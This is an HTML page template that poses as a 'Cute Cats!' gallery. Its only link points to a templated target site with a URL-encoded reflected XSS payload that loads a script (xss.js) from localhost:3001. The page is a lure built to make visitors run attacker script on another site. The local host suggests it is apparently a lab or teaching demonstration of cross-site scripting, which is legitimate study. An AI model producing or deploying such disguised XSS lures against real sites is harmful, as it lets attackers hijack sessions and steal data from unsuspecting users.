<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Cute Cats!</title>
  </head>
  <body>
    <h1>Cute cats!</h1>
    <p>So many cats here, have fun!</p>
    <img
      src="https://www.sciencenews.org/wp-content/uploads/2019/07/072319_ee_cat-allergy_feat.jpg"
    />
    <p>
      Want more cats? click
      <a
        href="<%= target %>/hello?name=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%3A3001%2Fxss.js%22%3E%3C%2Fscript%3E"
        >here</a
      >!
    </p>
  </body>
</html>
